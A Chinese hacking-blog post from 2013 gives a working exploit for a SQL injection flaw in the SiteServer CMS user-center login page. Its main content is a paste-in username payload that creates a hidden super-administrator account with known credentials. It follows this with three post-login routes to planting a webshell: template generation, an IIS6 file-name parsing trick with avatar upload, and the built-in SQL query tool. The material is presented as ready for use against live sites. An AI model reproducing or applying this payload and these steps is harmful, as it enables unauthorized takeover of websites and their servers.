SiteServer CMS UserCenter/login.aspx页面用户名处sql注射


Jan 09 2013

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

首页 » 代码审计 » SiteServer CMS UserCenter/login.aspx页面用户名处sql注射   

经测试秒杀最新的3.5版
 
stieserver官网:www.siteserver.cn
 
 
 
EXP:
 
直接访问UserCenter/login.aspx
 
 
 
用户名处输入:
 
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
 
 
 
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
 
 
 
之后再访问后台SiteServer/login.aspx用插入的用户登陆
 
 
 
后台拿webshell的三种方法:
 
一、
 
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
 
二、
 
成员权限-》添加用户-》用户名为:1.asp
 
http://127.0.0.1/usercenter/ 
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
 
(ps:后台添加用户时不会验证是否含有非法字符)
 
三、
 
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称,WEB路径
 
系统工具-》数据库工具-》SQL语句查询
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
 

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: 漏洞 SiteServer

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «burpsuite_pro_v1.5_crack最新版本及使用方法 | 渗透测试流程图»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~